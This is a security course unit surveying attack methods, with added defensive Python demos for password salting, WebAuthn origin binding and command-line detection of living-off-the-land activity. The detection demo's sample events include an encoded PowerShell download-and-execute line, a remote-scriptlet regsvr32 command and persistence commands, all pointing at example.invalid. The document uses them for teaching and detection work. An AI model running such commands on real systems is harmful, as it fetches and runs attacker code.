Unit II Overview: Attack Tools & Methods Landscape
Unit II surveys the practical toolkit of cyber attackers: the specific techniques, tools, and methodologies used to compromise systems and steal data. Understanding attacks from the attacker's perspective is fundamental to building effective defenses. This unit covers phishing, password attacks, keyloggers, malware families (viruses, worms, Trojans, backdoors/RATs), steganography, and denial-of-service attacks.
---
The Attack Kill Chain
Before diving into individual tools, it helps to place attacks within the Lockheed Martin Cyber Kill Chain, a model describing the stages of a targeted intrusion. Its defensive point is that the stages are sequential: breaking any one link (blocking delivery, preventing installation, cutting the C2 channel) stops the attack before the attacker reaches the objective.
| Phase | Name | Description | Attacker Actions | Detection Opportunities |
|---|---|---|---|---|
| 1 | Reconnaissance | Gathering information about the target | OSINT, LinkedIn scraping, port scanning | Scan detection, web/DNS log anomalies, honeypots |
| 2 | Weaponization | Creating the attack payload | Building phishing email, packaging exploit with malware | Not directly observable by the target; threat intelligence on known kits and exploits |
| 3 | Delivery | Delivering the weapon to target | Phishing email, malicious USB, watering hole | Email gateway, URL filtering |
| 4 | Exploitation | Triggering vulnerability | User clicks link, application exploit fires | AV, EDR, SIEM alerts |
| 5 | Installation | Installing persistent access | Trojan, backdoor, rootkit installation | EDR behavioral detection |
| 6 | C2 | Establishing command channel | Malware beacons out to C2 server | Network anomaly detection, DNS/proxy log monitoring, beaconing analysis |
| 7 | Actions on Objective | Accomplishing attack goals | Data exfiltration, ransomware encryption | DLP, UEBA, threat hunting |
---
Attack Methods — Quick Comparison
| Attack Method | Primary Target | How It Works | Skill Required | Defense |
|---|---|---|---|---|
| Phishing | Human (user credentials) | Fake email/website tricks user | Low (kits available) | Email filtering, user training |
| Password Cracking | Authentication systems | Guessing passwords online, or computing hashes offline against a stolen database | Low–Medium | Strong unique passwords, MFA, slow salted hashing (bcrypt/scrypt/Argon2), lockout and rate limiting |
| Keylogger | User input (credentials, messages) | Records keystrokes | Low (commercial tools) | AV/EDR, behavioral monitoring |
| Virus | Files and programs | Attaches to executable files and spreads when they run | Medium | AV, file integrity monitoring |
| Worm | Networks | Self-replicates across networks by exploiting unpatched services | Medium–High | Network segmentation, patching |
| Trojan Horse | User trust | Disguises malware as legitimate software | Medium | Code signing, sandboxing, user education |
| Backdoor / RAT | System persistence | Hidden remote access channel | Low–High (commodity RATs are sold as kits; custom implants need skill) | Network monitoring, EDR |
| Steganography | Data exfiltration, covert comms | Hides data inside innocent-looking files (e.g., in the low-order bits of image pixels) | Medium | Steganalysis tools, DLP, re-encoding or stripping outbound media |
| DoS / DDoS | Availability of services | Overwhelms target with traffic | Low–Medium (botnets) | Rate limiting, CDN, anycast |
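The "salting" defense in the Password Cracking row is easy to state and worth seeing in code. The example below is added here and is not part of the course page: it builds a precomputed lookup table against fast unsalted hashes, then shows that a per-user random salt plus a slow KDF (PBKDF2 here) forces the attacker to recompute for every user and every guess. The user database, passwords and the five-word wordlist are constructed for the demo.

```python
"""Added example (not from the course page): why salting plus a slow KDF
defeats precomputed password-hash attacks. All users, passwords and the
wordlist below are constructed for the demo."""
import hashlib
import os

# Constructed miniature wordlist (stand-in for something like rockyou.txt).
WORDLIST = ["password", "letmein", "summer2024", "qwerty", "hunter2"]


def unsalted_hash(pw: str) -> str:
    """The weak scheme: a fast, unsalted hash of the password alone."""
    return hashlib.sha256(pw.encode()).hexdigest()


def salted_hash(pw: str, salt: bytes, iterations: int) -> bytes:
    """The hardened scheme: per-user random salt and a deliberately slow KDF."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)


def make_unsalted_db(creds: dict) -> dict:
    """{user: hex digest}; identical passwords produce identical digests."""
    return {user: unsalted_hash(pw) for user, pw in creds.items()}


def make_salted_db(creds: dict, iterations: int) -> dict:
    """{user: (salt, digest)}; identical passwords produce different digests."""
    db = {}
    for user, pw in creds.items():
        salt = os.urandom(16)
        db[user] = (salt, salted_hash(pw, salt, iterations))
    return db


def build_rainbow_table(words) -> dict:
    """Precomputed once, offline, reusable against any unsalted database."""
    return {unsalted_hash(w): w for w in words}


def crack_unsalted(db: dict, table: dict) -> dict:
    """One dictionary lookup per user; no hashing at attack time at all."""
    return {user: table[h] for user, h in db.items() if h in table}


def crack_salted(db: dict, words, iterations: int):
    """The table is useless: each (user, guess) pair costs a full KDF run.
    Returns (recovered passwords, number of KDF computations performed)."""
    found, work = {}, 0
    for user, (salt, digest) in db.items():
        for guess in words:
            work += 1
            if salted_hash(guess, salt, iterations) == digest:
                found[user] = guess
                break
    return found, work


if __name__ == "__main__":
    creds = {"alice": "password", "bob": "password", "carol": "Tr0ub4dor&3"}
    udb = make_unsalted_db(creds)
    print("unsalted: alice and bob share a digest:", udb["alice"] == udb["bob"])
    print("unsalted cracked by table lookup:", crack_unsalted(udb, build_rainbow_table(WORDLIST)))
    sdb = make_salted_db(creds, iterations=100_000)
    print("salted: alice and bob differ:", sdb["alice"][1] != sdb["bob"][1])
    print("salted cracked, and KDF runs needed:", crack_salted(sdb, WORDLIST, iterations=100_000))
```

Note what the salt does and does not do: weak passwords ("password") are still recovered, but only by paying the KDF cost per user, and the identical-digest leak that reveals password reuse disappears. MFA is the defense for the case where the guess succeeds anyway.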
---
Mobile/Cell Phone Attack Landscape
Modern attacks increasingly target mobile devices:
| Mobile Attack Type | Vector | Target | Example | Prevention |
|---|---|---|---|---|
| Smishing | SMS phishing | Credentials, OTP theft | Fake bank SMS with link | Never follow SMS links or share OTPs; open the bank's app or site directly |
| Vishing | Voice call social engineering | Wire transfer authorization | "Microsoft Support" calls | Call back on a known number before acting, education |
| Malicious Apps | App stores (especially sideloading) | Full device compromise | Fake COVID apps with spyware | Official stores only, review requested permissions, mobile AV |
| SIM Swapping | Social engineering the carrier | MFA bypass, account takeover | High-profile crypto thefts | Carrier account PIN / port-out lock, avoid SMS-based MFA, FIDO2 hardware keys |
| Bluetooth Attacks | Bluejacking (unsolicited messages), Bluesnarfing (unauthorized data access) | Data theft, spam | Discoverable phones in crowded places such as airports | Non-discoverable mode, disable Bluetooth when not in use, keep firmware patched |
| SS7 Protocol Attacks | Weaknesses in the telecom signalling network | Call/SMS interception, location tracking | Political surveillance | End-to-end encrypted apps (Signal); do not rely on SMS for OTPs |
| Wi-Fi Eavesdropping | Rogue access points, evil twin | Credential interception | Evil-twin hotspot mimicking hotel Wi-Fi | VPN, HTTPS-only/HSTS, verify the network name with staff |
---
Study Deep: The Modern Attack Ecosystem
- Cybercrime-as-a-Service (CaaS) democratizes attacks: Today, a criminal with little technical skill can purchase phishing kits (roughly $50–200), ransomware-as-a-service (RaaS) affiliate access (the operator typically keeps 20–30% of each ransom), botnet rental, and DDoS-for-hire services on dark web forums. This has driven a sharp rise in attack volume, because the technical barrier to entry is now very low.
- Dual-use tools dominate: The same tools used by attackers are used by defenders. Metasploit (penetration testing framework), Wireshark (network analyzer), Nmap (port scanner), Hashcat (password cracker): all are legitimate security tools that criminals also use. Possession is therefore not evidence of intent, and jurisdictions differ on how their "hacking tool" provisions treat them.
- Living off the Land (LotL) attacks evade AV: Sophisticated attackers increasingly avoid custom malware that AV can detect by hash or signature. Instead they use native OS tools: PowerShell, WMI, scheduled tasks, PsExec. These "living off the land" techniques blend into normal system activity, so detection depends on telemetry that records how a tool was invoked (process-creation events such as Windows 4688 or Sysmon Event ID 1 with command lines, PowerShell script block logging, Event ID 4104) and on rules keyed to suspicious arguments rather than to file hashes.
- Phishing remains the #1 initial access vector: Despite being decades old, phishing is responsible for 91% of cyber attacks (PhishMe). This is not because phishing is technically sophisticated; it is because humans are naturally trusting and busy. The strongest defense against credential phishing is FIDO2 hardware security keys: the credential is bound to the website origin, so a look-alike domain cannot obtain a usable login assertion, and there is no password or OTP for the victim to type into the fake page. Note the scope: this stops credential theft, not phishing emails that deliver malware attachments.
- Mobile has overtaken desktop as an attack surface: More than 50% of global web traffic is mobile. Attackers have adapted: mobile phishing via SMS (smishing), malicious apps on third-party stores, and exploitation of mobile OS vulnerabilities. Mobile device management (MDM/UEM) combined with mobile threat defense is now as critical as desktop AV.
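The living-off-the-land point above is really a detection-engineering point: you cannot block powershell.exe or schtasks.exe, so you alert on how they are invoked. The example below is added here and is not from the course page or any vendor product. It runs a handful of command-line rules over constructed process-creation events written in a simple key=value layout that resembles Sysmon Event ID 1 / Windows 4688 fields (the layout, the hostname FILESRV01 and the example.invalid URLs are assumptions), and it decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE) so the analyst sees the script that was actually run. It goes slightly beyond the bullet by also covering regsvr32 remote-scriptlet loading, another common LotL pattern.

```python
"""Added example (not from the course page): flag living-off-the-land
activity from process-creation telemetry by matching command-line patterns
rather than file hashes. Sample events are constructed; their key=value
layout imitates Sysmon Event ID 1 / Windows 4688 fields (an assumption)."""
import base64
import re

# Constructed sample of what an attacker hides behind -EncodedCommand.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c dir C:\Users",
    rf"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    rf"CommandLine=powershell.exe -nop -w hidden -enc {_ENCODED}",
    r'Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic process call create "C:\Users\Public\u.exe"',
    r"Image=C:\Windows\System32\schtasks.exe CommandLine=schtasks /create /sc onlogon /tn Updater /tr C:\Users\Public\u.exe",
    r"Image=C:\Tools\PsExec.exe CommandLine=PsExec.exe \\FILESRV01 -s cmd.exe",
    r"Image=C:\Windows\System32\regsvr32.exe CommandLine=regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
]

# Field parser for the assumed layout; keys are fixed so that '=' signs inside
# a command line (e.g. base64 padding) are not mistaken for a new field.
_KEYS = r"(?:Image|CommandLine|ParentImage|User)"
FIELD_RE = re.compile(rf"({_KEYS})=(.*?)(?= {_KEYS}=|$)")

# Each rule: (name, regex applied to the CommandLine field, case-insensitive).
RULES = [
    ("powershell_encoded_command",
     re.compile(r"\b(powershell|pwsh)(\.exe)?\b.*\s-(e|ec|en|enc|encodedcommand)\b", re.I)),
    ("powershell_hidden_noprofile",
     re.compile(r"\b(powershell|pwsh)(\.exe)?\b.*(-nop\b|-noprofile\b|-w(indowstyle)?\s+hidden\b)", re.I)),
    ("wmic_process_create", re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("schtasks_persistence", re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I)),
    ("psexec_remote_exec", re.compile(r"\bpsexe(c|svc)(64)?(\.exe)?\b", re.I)),
    ("regsvr32_remote_scriptlet", re.compile(r"\bregsvr32(\.exe)?\b.*(/i:https?://|\bscrobj\.dll\b)", re.I)),
]

ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def parse_event(line: str) -> dict:
    """Split one key=value event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return the script or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return (rule, image, command line, decoded script or None) per hit."""
    hits = []
    for line in events:
        ev = parse_event(line)
        cmd = ev.get("CommandLine", "")
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((name, ev.get("Image", ""), cmd, decode_encoded_command(cmd)))
    return hits


def hit_rules(events):
    """Sorted, de-duplicated rule names that fired over the event set."""
    return sorted({h[0] for h in detect(events)})


if __name__ == "__main__":
    for name, image, cmd, decoded in detect(SAMPLE_EVENTS):
        print(f"[{name}] {image}\n    {cmd}" + (f"\n    decoded: {decoded}" if decoded else ""))
```

The benign `cmd.exe /c dir` line fires nothing, which is the point: the signal is in the arguments (`-enc`, `-w hidden`, `process call create`, `/create`, `/i:http://`), not in the binary. In production these rules would be tuned against the environment's baseline, since administrators also use schtasks and PsExec.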
Exam Tip: Unit II focuses on PRACTICAL attack methods. For each attack, know: (1) how it works mechanically, (2) what it targets, (3) real-world examples, (4) how to defend against it. The seven Cyber Kill Chain phases are important for understanding how attacks unfold sequentially and where defenses can be applied.
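The phishing bullet in the Study Deep list claims that FIDO2 keys resist credential phishing because the credential is bound to the site's origin. The simulation below is added here and is not from the course page or from any FIDO library; it shows the two checks that do the work: the authenticator only uses a credential for the rpId that the browser (not the page script) derives from the page's host, and the relying party verifies that the signed clientDataJSON names its own origin and that authenticatorData begins with SHA-256(rpId). Assumptions for an offline, stdlib-only demo: the public-key signature is replaced by an HMAC over the same bytes WebAuthn signs, and bank.example / bank-example.com are hypothetical names.

```python
"""Added example (not from the course page): simulation of WebAuthn origin
binding. Assumption: HMAC stands in for the authenticator's asymmetric
signature; the origin and rpIdHash checks are the real WebAuthn steps."""
import hashlib
import hmac
import json
import os

RP_ID = "bank.example"                 # hypothetical relying party id
RP_ORIGIN = "https://bank.example"     # the only origin the RP will accept


class Authenticator:
    """A security key: each credential is scoped to one rpId."""

    def __init__(self):
        self._creds = {}   # credential id -> (rp_id, key)

    def register(self, rp_id: str) -> bytes:
        cred_id = os.urandom(16)
        self._creds[cred_id] = (rp_id, os.urandom(32))
        return cred_id

    def verification_key(self, cred_id: bytes) -> bytes:
        # Stand-in for the public key the RP stores at registration
        # (assumption: a shared HMAC key; a real key exports only a public key).
        return self._creds[cred_id][1]

    def get_assertion(self, cred_id: bytes, rp_id: str, client_data_json: bytes):
        stored_rp_id, key = self._creds[cred_id]
        if rp_id != stored_rp_id:
            return None            # no credential for this rpId: nothing to sign
        flags, counter = b"\x01", (1).to_bytes(4, "big")   # UP flag, sign counter
        auth_data = hashlib.sha256(rp_id.encode()).digest() + flags + counter
        signed = auth_data + hashlib.sha256(client_data_json).digest()
        return auth_data, hmac.new(key, signed, hashlib.sha256).digest()


def browser_get(authenticator, cred_id: bytes, page_origin: str, challenge: str):
    """What the browser does for navigator.credentials.get(): it, not the
    page script, writes the origin into clientDataJSON and derives the rpId."""
    rp_id = page_origin.split("://", 1)[1]        # default rpId is the page host
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    result = authenticator.get_assertion(cred_id, rp_id, client_data)
    if result is None:
        return None
    auth_data, signature = result
    return {"clientDataJSON": client_data, "authenticatorData": auth_data,
            "signature": signature}


def rp_verify(assertion, key: bytes, expected_challenge: str) -> bool:
    """Relying-party checks from the WebAuthn assertion verification steps."""
    if assertion is None:
        return False
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != expected_challenge:
        return False                                    # replay / wrong ceremony
    if cd.get("origin") != RP_ORIGIN:
        return False                                    # origin binding
    auth_data = assertion["authenticatorData"]
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False                                    # rpIdHash check
    signed = auth_data + hashlib.sha256(assertion["clientDataJSON"]).digest()
    expected = hmac.new(key, signed, hashlib.sha256).digest()
    return hmac.compare_digest(expected, assertion["signature"])


def phishing_scenarios() -> dict:
    """Legitimate login vs. a look-alike phishing page vs. a forged origin."""
    auth = Authenticator()
    cred_id = auth.register(RP_ID)
    key = auth.verification_key(cred_id)
    challenge = "c29tZS1yYW5kb20tY2hhbGxlbmdl"   # constructed; RP issues a fresh one per login
    legit = browser_get(auth, cred_id, RP_ORIGIN, challenge)
    phish = browser_get(auth, cred_id, "https://bank-example.com", challenge)
    # Even if an attacker somehow got the key to sign client data naming the
    # phishing origin (constructed directly here), the RP's origin check rejects it.
    forged_cd = json.dumps({"type": "webauthn.get", "challenge": challenge,
                            "origin": "https://bank-example.com"}, sort_keys=True).encode()
    auth_data, sig = auth.get_assertion(cred_id, RP_ID, forged_cd)
    forged = {"clientDataJSON": forged_cd, "authenticatorData": auth_data, "signature": sig}
    return {
        "legit_accepted": rp_verify(legit, key, challenge),
        "phish_has_credential": phish is not None,
        "forged_origin_accepted": rp_verify(forged, key, challenge),
        "replayed_accepted": rp_verify(legit, key, "a-different-challenge"),
    }


if __name__ == "__main__":
    print(phishing_scenarios())
```

Contrast this with a password or SMS OTP: both are secrets the user can be talked into typing on bank-example.com, and the attacker simply relays them. Here the phishing page never obtains anything the real site will accept, which is what "phishing-resistant MFA" means.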